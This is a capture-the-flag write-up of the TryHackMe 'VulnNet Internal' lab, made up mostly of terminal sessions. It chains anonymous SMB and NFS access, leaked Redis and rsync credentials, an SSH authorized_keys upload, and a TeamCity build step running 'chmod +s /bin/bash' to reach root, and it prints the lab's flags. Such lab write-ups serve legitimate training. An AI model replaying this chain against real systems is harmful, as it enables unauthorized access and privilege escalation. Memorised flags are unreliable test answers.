The platform develops virtual
classrooms that not only allow users to deploy training environments with the
click of a button, but also reinforce learning by adding a question-answer
approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe VulnNet Internal As a Penetration Testing
While using a question-answer model
does make learning easier, TryHackMe allows users to create their own virtual
classrooms to teach particular topics enabling them to become teachers. This
not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
VulnNet Entertainment learns from its mistakes, and now they have something new for you...TryHackMe VulnNet Internal As a Penetration Testing
We start of my driving of tryhackme this room a quick scan on all ports using threader300 and simultaneously running nmap service scan to cover the top ports
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ sudo nmap -A -T4 -Pn -sV -vv -p- 10.10.155.145 [sudo] password for hackerboy: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. Scanning 10.10.155.145 [65535 ports] Discovered open port 111/tcp on 10.10.155.145 Discovered open port 22/tcp on 10.10.155.145 Discovered open port 139/tcp on 10.10.155.145 Discovered open port 445/tcp on 10.10.155.145 Discovered open port 45811/tcp on 10.10.155.145 Discovered open port 51665/tcp on 10.10.155.145 Discovered open port 57017/tcp on 10.10.155.145 Discovered open port 39557/tcp on 10.10.155.145 Discovered open port 2049/tcp on 10.10.155.145 Discovered open port 6379/tcp on 10.10.155.145 Discovered open port 873/tcp on 10.10.155.145 Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports) Nmap scan report for 10.10.155.145 Host is up, received user-set (0.21s latency). Scanned at 2021-05-10 19:10:58 IST for 561s Not shown: 65523 closed ports Reason: 65523 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV | 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE= | 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i 111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3 2049/udp nfs | 100003 3 2049/udp6 nfs | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100005 1,2,3 40068/udp6 mountd | 100005 1,2,3 51665/tcp mountd | 100005 1,2,3 51843/tcp6 mountd | 100005 1,2,3 56229/udp mountd | 100021 1,3,4 39572/udp6 nlockmgr | 100021 1,3,4 39935/tcp6 nlockmgr | 100021 1,3,4 45811/tcp nlockmgr | 100021 1,3,4 48120/udp nlockmgr | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) 873/tcp open rsync syn-ack ttl 63 (protocol version 31) 2049/tcp open nfs_acl syn-ack ttl 63 3 (RPC #100227) 6379/tcp open redis syn-ack ttl 63 Redis key-value store 9090/tcp filtered zeus-admin no-response 39557/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005) 45811/tcp open nlockmgr syn-ack ttl 63 1-4 (RPC #100021) 51665/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005) 57017/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005) TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1 OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Uptime guess: 30.994 days (since Fri Apr 9 19:28:16 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB) ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ sudo nmap -p 445 --script=smb-enum-shares.nse, smb-enum-users.nse 10.10.155.145 130 ⨯ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST Failed to resolve "smb-enum-users.nse". Nmap scan report for 10.10.155.145 Host is up (0.21s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.155.145\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu)) | Users: 1 | Max Users:| Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.155.145\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: | Current user access: | \\10.10.155.145\shares: | Type: STYPE_DISKTREE | Comment: VulnNet Business Shares | Users: 0 | Max Users: | Path: C:\opt\shares | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
so, after observing the whole nmap output process we decide that we need to
enumerate serveral ports, otherwise we will enumerate with SMB.
SMB Enumeration: 138 & 445
so we will use enum4linux tool in our machine with vulnerable macine IP
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ enum4linux 10.10.155.145 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021 ========================== | Target Information | ========================== Target ........... 10.10.155.145 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ========================================== | Share Enumeration on 10.10.155.145 | ========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers shares Disk VulnNet Business Shares IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.155.145 //10.10.155.145/print$ Mapping: DENIED, Listing: N/A //10.10.155.145/shares Mapping: OK, Listing: OK //10.10.155.145/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ===================================================== | www.kumaratuljaiswal.in www.hackingtruth.in | ===================================================== enum4linux complete on Mon May 10 19:27:33 2021 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$
I can connect to shares without supplying a password
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ sudo smbclient //10.10.155.145/shares 1 ⨯ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls temp D 0 Sat Feb 6 17:15:10 2021 data D 0 Tue Feb 2 14:57:33 2021 11309648 blocks of size 1024. 3275872 blocks available smb: \> cd temp smb: \temp\> ls services.txt N 38 Sat Feb 6 17:15:09 2021 11309648 blocks of size 1024. 3275872 blocks available smb: \temp\> get services.txt getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \temp\> cd .. smb: \> ls temp D 0 Sat Feb 6 17:15:10 2021 data D 0 Tue Feb 2 14:57:33 2021 11309648 blocks of size 1024. 3275868 blocks available smb: \> cd data smb: \data\> ls data.txt N 48 Tue Feb 2 14:51:18 2021 business-req.txt N 190 Tue Feb 2 14:57:33 2021 11309648 blocks of size 1024. 3275868 blocks available smb: \data\> get data.txt getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \data\> get business-req.txt getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \data\> ls data.txt N 48 Tue Feb 2 14:51:18 2021 business-req.txt N 190 Tue Feb 2 14:57:33 2021 11309648 blocks of size 1024. 3275868 blocks available smb: \data\> cd smb: \> pwd Current directory is \\10.10.155.145\shares\ smb: \> exit ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
Browsing whole around the SMB services, only one file contains useful information, the services.txt
so, as you can see... downloading and reading this file I find the first flag
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ cat services.txt THM{0a09d51e488f5fa105d8d866a497440a} ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ cat data.txt Purge regularly data that is not needed anymore ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ cat business-req.txt We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed. If you have any questions, please text or phone us. ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$
I also found NFS open, so I can look to see if I can mount to anything
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ sudo showmount -e 10.10.155.145 Export list for 10.10.155.145: /opt/conf * ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
Exploit
We start by listing the share’s available to be mounted from the server using showmount, then we mount the share on out local machine in the conf directory
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ mkdir conf ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ls conf ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ cd conf ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf] └─$ ls hp init opt profile.d redis vim wildmidi ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf] └─$ cd redis ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis] └─$ ls redis.conf ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis] └─$
Enumerating the share, we quickly dive down to the Redis directory to find
notable information in the redis.conf file..(save this password anywhere)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis] └─$ ls redis.conf ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis] └─$ cat redis.conf # Redis configuration file example. # # If the master is password protected (using the "requirepass" configuration # directive below) it is possible to tell the slave to authenticate before # starting the replication synchronization process, otherwise the master will # refuse the slave request. # # masterauthrequirepass "B65Hx562F@ggAZ@F" # ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis] └─$
REDIS Enumeration : 6379
REDIS the Remote Dictionary Server is an
in-memory database we could enumerate Redis with either Netcat, MSF auxiliary
scanner or Redis-cli
But first you need to install redis-cli in your linux & whatever you have..
apt-get insall redis-tool
using Redis-cli which the best in my opinion we connect to the Redis server using the credentials we found in the mount earlier then query it for the list and content of database it holds
I found a redis password, so I can use this to login to the open redis port
hello myself kumar atul jaiswal and i am a cyber security specialist
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 10.10.155.145:6379> keys * 1) "marketlist" 2) "tmp" 3) "internal flag" 4) "int" 5) "authlist" 10.10.155.145:6379> get "internal flag" "THM{ff8e518addbbddb74531a724236a8221}" 10.10.155.145:6379>
A list of useful commands can be found at: https://redis.io/commands After playing around and through trial and error, I was finally able to locate the internal flag
Once again, after trying different commands, I was finally able to access the authlist.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 10.10.155.145:6379> keys * 1) "marketlist" 2) "tmp" 3) "internal flag" 4) "int" 5) "authlist" 10.10.155.145:6379> type authlist list 10.10.155.145:6379> lrange authlist 1 100 1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" 2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" 3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" 10.10.155.145:6379>
Decoding the cypher
From the look of it, we can tell that it's encoded in base64. Let's decode it.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$
This leads us to rsync; again this is not at all surprising as we saw all these services running in our initial nmap scan.
Enumerating rsync
A quick refresher using --help shows us the switches we need to use.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ rsync -av --list-only rsync://10.10.155.145:873 files Necessary home interaction ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
Creating a folder and copying the files
Browsing the directory, we can find user.txt. Other than that, there isn't
anything useful here, except for the username. Now we can try to upload a
public ssh key to the server and ssh into it.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ mkdir files 10 ⨯ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync 10 ⨯ Password: receiving incremental file list created directory ./rsync ./ sys-internal/ sys-internal/.bashrc sys-internal/.rediscli_history -> /dev/null sys-internal/.sudo_as_admin_successful sys-internal/.xsession-errors.old sys-internal/user.txt
I can download files, like user.txt, but I also have the ability to upload files. I can upload an authorized_keys file to .ssh that I made so I can login through SSH. To start, I create the keys on my local system
without pass
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ssh-keygen -f ./id_rsa Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in ./id_rsa Your public key has been saved in ./id_rsa.pub The key fingerprint is: SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal The key's randomart image is: +---[RSA 3072]----+ | | | | | | | . . | |. + = . S | | o B o+.. | | o + *=.*.. | | .+ X+B@ooo. | | oo.O+O@+=E. | +----[SHA256]-----+ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
With this created, I change the named of id_rsa.pub to authorized_keys then upload the file.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ls id_rsa id_rsa.pub ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ sudo cp id_rsa.pub authorized_keys [sudo] password for hackerboy: ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ls authorized_keys id_rsa id_rsa.pub ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
with this password Hcg3HP67@TW@Bc72v
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g Password: sending incremental file list id_rsa.pub sent 674 bytes received 35 bytes 18.42 bytes/sec total size is 580 speedup is 0.82 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
Other Method for Uploading a File
with python3 we are doing a file transfer with this command
python3 -m http.server 1234
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ python3 -m http.server 1234 10 ⨯ Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ... 10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 - 10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found 10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 - 10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 - ^C Keyboard interrupt received, exiting. ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$
then go to in our browser and type in the search bar 10.8.61.234:1234 (with own IP and port which is used to above the command).
and download in vulnerable machine(sys-internal@vulnet-internal) via
wget command. (Note - wget tool already installed in sys-internal
machine except curl)
sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys --2021-05-10 14:16:10-- http://10.8.61.234:1234/authorized_keys Connecting to 10.8.61.234:1234... connected. HTTP request sent, awaiting response... 200 OK Length: 580 [application/octet-stream] Saving to: ‘authorized_keys.1’ authorized_keys 100%[===========================================================>] 580 --.-KB/s in 0s 2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580] sys-internal@vulnnet-internal:~/.ssh$ ls authorized_keys authorized_keys sys-internal@vulnnet-internal:~/.ssh$
I can now login as sys-internal through SSH in our machine.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ssh -i id_rsa sys-internal@10.10.155.145 Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 541 packages can be updated. 342 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon May 10 13:57:55 2021 from 10.8.61.234 sys-internal@vulnnet-internal:~$ whoami sys-internal sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in sys-internal@vulnnet-internal:~$ ls Desktop Documents Downloads Music Pictures Public Templates user.txt Videos sys-internal@vulnnet-internal:~$
Privilege Escalation
Manually enumerating, I find a directory under / named TeamCity. Looking at this, I see it is running a webserver
and
cat TeamCity-readme.txt
sys-internal@vulnnet-internal:~$ cd /TeamCity sys-internal@vulnnet-internal:/TeamCity$ ls bin buildAgent devPackage licenses service.properties temp webapps BUILD_85899 conf lib logs TeamCity-readme.txt Tomcat-running.txt work sys-internal@vulnnet-internal:/TeamCity$ cat TeamCity-readme.txt This is the JetBrains TeamCity home directory. For evaluation purposes, we recommend running both server and agent. If you need to run only the TeamCity server, execute: * On Windows: `.\bin\teamcity-server.bat start` * On Linux and macOS: `./bin/teamcity-server.sh start` sys-internal@vulnnet-internal:/TeamCity$ sys-internal@vulnnet-internal:/TeamCity$
sys-internal@vulnnet-internal:/TeamCity$ sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111 tcp ESTAB 0 0 [::ffff:127.0.0.1]:58689 [::ffff:127.0.0.1]:8111 tcp CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:39595 [::ffff:127.0.0.1]:8111 tcp ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:58689 sys-internal@vulnnet-internal:/TeamCity$
I can set up an SSH port forwarding so I can access port 8111 on my localhost
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet] └─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111 Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 541 packages can be updated. 342 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon May 10 14:20:06 2021 from 10.8.61.234 sys-internal@vulnnet-internal:~$
Now when I go to localhost:8111 I can connect to TeamCity and it is running version 2.2.
When I click on Login as Super User I see I need a Authentication Token. Going back to my SSH session, I can grep for an authentication token
sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token" grep: temp/jna-3506402: Permission denied grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied grep: webapps/ROOT/plugins/data-dir-browse: Permission denied grep: webapps/ROOT/plugins/coverage: Permission denied logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server) logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server) logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server) logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server) sys-internal@vulnnet-internal:/TeamCity$
authentication token 8070510537629599387
I found several authentication tokens under logs/catalina.out. Using these, I can login. Poking around, I find I can create a new build.
First Creating a new build, I can run a build step and execute python. My first thought was to throw in a python reverse shell but this did not work. so, don't worry we have a 2nd solution.
Since TeamCity is running as root, whatever connection we can get it to spawn
will be with root permissions, we immediately started to poke for console
pages/terminal or anything that be used to run system commands
After
a while we figured you can create a project then build configuration, skipping
the question for “New VCS Root”,
After creating a build configuration
choose “Build Steps” on the left
menu to add a build step,
Choose the runner type “Python”. Choose command as custom script
then
place in the custom script section we write a some simple script..
I
can change an SUID to elevate my privileges. Since bash is the easiest, I
chose to do that.
import os
os.system("chmod +s /bin/bash")
After saving this build and running it, I go back to SSH session.
Here, I see /bin/bash permissions have changed.
sys-internal@vulnnet-internal:/TeamCity$ sys-internal@vulnnet-internal:/TeamCity$ cd sys-internal@vulnnet-internal:~$ ls /bin/bash /bin/bash sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in sys-internal@vulnnet-internal:~$ ls /bin/bash /bin/bash sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in sys-internal@vulnnet-internal:~$
I can now elevate my privileges to root..
As root, I can read root.txt
sys-internal@vulnnet-internal:~$ sys-internal@vulnnet-internal:~$ cd /bin/bash -bash: cd: /bin/bash: Not a directory sys-internal@vulnnet-internal:~$ sys-internal@vulnnet-internal:~$ /bin/bash -p bash-4.4# whoami root bash-4.4# #kumaratuljaiswal.in bash-4.4# bash-4.4# cat /root/root.txt THM{e8996faea46df09dba5676dd271c60bd} bash-4.4#
Finally we won!! Thanks for supporting :-)
Disclaimer
This was written for educational purpose and pentest only.
The author
will not be responsible for any damage ..!
The author of this tool is not
responsible for any misuse of the information.
You will not misuse the
information to gain unauthorized access.
This information shall only be
used to expand knowledge and not for causing malicious or damaging
attacks. Performing any hacks without written permission is illegal ..!
All
video’s and tutorials are for informational and educational purposes only. We
believe that ethical hacking, information security and cyber security should
be familiar subjects to anyone using digital information and computers. We
believe that it is impossible to defend yourself from hackers without knowing
how hacking is done. The tutorials and videos provided on www.hackingtruth.in
is only for those who are interested to learn about Ethical Hacking, Security,
Penetration Testing and malware analysis. Hacking tutorials is against misuse
of the information and we strongly suggest against it. Please regard the word
hacking as ethical hacking or penetration testing every time this word is
used.
All tutorials and videos have been made using our own
routers, servers, websites and other resources, they do not contain any
illegal activity. We do not promote, encourage, support or excite any illegal
activity or hacking without written permission in general. We want to raise
security awareness and inform our readers on how to prevent themselves from
being a victim of hackers. If you plan to use the information for illegal
purposes, please leave this website now. We cannot be held responsible for any
misuse of the given information.
- Hacking Truth by
Kumar Atul Jaiswal
I hope you liked this post, then you
should not forget to share this post at all.
Thank you so much :-)